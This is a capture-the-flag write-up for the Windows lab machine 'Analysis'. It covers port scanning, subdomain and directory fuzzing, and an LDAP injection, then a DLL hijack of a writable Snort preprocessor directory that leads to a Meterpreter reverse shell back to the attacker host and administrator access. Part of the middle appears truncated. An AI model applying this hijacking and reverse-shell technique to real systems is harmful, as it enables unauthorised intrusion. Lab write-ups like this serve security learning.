Blog

Analysis

A Window Machine with an unintended privilege escalation

Enumeration

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ nmap -sC -sV -Pn 10.10.11.250
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-21 20:14 EST
Nmap scan report for analysis.htb (10.10.11.250)
Host is up (0.69s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
| http-server-header: 
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-22 01:14:26Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3306/tcp open  mysql         MySQL (unauthorized)
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -2s
| smb2-time: 
|   date: 2024-01-22T01:14:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.58 secon

DNS + http sounds like a great combination for subdomain fuzzing.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ gobuster dns -d analysis.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     analysis.htb
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2024/01/21 20:18:24 Starting gobuster in DNS enumeration mode
===============================================================
Found: internal.analysis.htb

Upon loading the site, we get a 403 error forbidden. Time to brute force the directories and file path.

──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ ffuf -u http://internal.analysis.htb/users/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://internal.analysis.htb/users/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 17, Words: 2, Lines: 1, Duration: 98ms]
    * FUZZ: list.php

[Status: 200, Size: 17, Words: 2, Lines: 1, Duration: 5ms]
    * FUZZ: List.php

Visiting list.php, we get missing parameter and if we put a valid name we get back results!

Judging from this columns, it seems that the name parameter is susceptible to LDAP injection.

After a long while, I disc

Privilege Escalation (Unintended)

We can perform a DLL hijacking based on having write-permissions in the C:\Snort\lib\snort_dynamicpreprocessor directory.

According to the snort.conf located in C:\Snort\etc\ it defines the following

###################################################
# Step #4: Configure dynamic loaded libraries.  
# For more information, see Snort Manual, Configuring Snort - Dynamic Modules
###################################################

# path to dynamic preprocessor libraries
dynamicpreprocessor directory C:\Snort\lib\snort_dynamicpreprocessor

# path to base preprocessor engine
dynamicengine C:\Snort\lib\snort_dynamicengine\sf_engine.dll

# path to dynamic rules libraries
# dynamicdetection directory C:\Snort\lib\snort_dynamicrules

We can tell that snort is restarting on intervals as the snort log is getting updated.

Therefore, we can drop our malicious DLL named sf_engine.dll into the C:\Snort\lib\snort_dynamicpreprocessor directory.

After uploading our malicious DLL to the directory and running snort with the config file listed above, we see that our DLL is actually laoded with no shell sadly.

Evil-WinRM* PS C:\Snort\bin> ./snort.exe -c C:\Snort\etc\snort.conf
snort.exe : Running in IDS mode
    + CategoryInfo          : NotSpecified: (Running in IDS mode:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
        --== Initializing Snort ==--Initializing Output Plugins!Initializing Preprocessors!Initializing Plug-ins!Parsing Rules file "C:\Snort\etc\snort.conf"PortVar 'HTTP_PORTS' defined :  [ 80:81 311 383 591 593 901 1220 1414 1741 1830 2301 2381 2809 3037 3128 3702 4343 4848 5250 6988 7000:7001 7144:7145 7510 7777 7779 8000 8008 8014 8028 8080 8085 8088 8090 8118 8123 8180:8181 8243 8280 8300 8800 8888 8899 9000 9060 9080 9090:9091 9443 9999 11371 34443:34444 41080 50002 55555 ]PortVar 'SHELLCODE_PORTS' defined :  [ 0:79 81:65535 ]PortVar 'ORACLE_PORTS' defined :  [ 1024:65535 ]PortVar 'SSH_PORTS' defined :  [ 22 ]PortVar 'FTP_PORTS' defined :  [ 21 2100 3535 ]PortVar 'SIP_PORTS' defined :  [ 5060:5061 5600 ]PortVar 'FILE_DATA_PORTS' defined :  [ 80:81 110 143 311 383 591 593 901 1220 1414 1741 1830 2301 2381 2809 3037 3128 3702 4343 4848 5250 6988 7000:7001 7144:7145 7510 7777 7779 8000 8008 8014 8028 8080 8085 8088 8090 8118 8123 8180:8181 8243 8280 8300 8800 8888 8899 9000 9060 9080 9090:9091 9443 9999 11371 34443:34444 41080 50002 55555 ]PortVar 'GTP_PORTS' defined :  [ 2123 2152 3386 ]Detection:   Search-Method = AC-Full-Q    Split Any/Any group = enabled    Search-Method-Optimizations = enabled    Maximum pattern length = 20Tagged Packet Limit: 256Loading dynamic engine C:\Snort\lib\snort_dynamicengine\sf_engine.dll... doneLoading all dynamic preprocessor libs from C:\Snort\lib\snort_dynamicpreprocessor...  Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dce2.dll... done  Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dnp3.dll... done  Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dns.dll... done  Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_engine.dll...

However after awhile, my metrepeter listener manages to catch a privileged shell, presumably from the Adminstrator running the batch script to restart snort.

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.36:4444 
[*] Sending stage (200774 bytes) to 10.10.11.250
[*] Meterpreter session 1 opened (10.10.14.36:4444 -> 10.10.11.250:65304) at 2024-01-21 19:59:11 -0500

meterpreter > shell
Process 15708 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
analysis\administrateur
PreviousBoxesNextDevOops

Last updated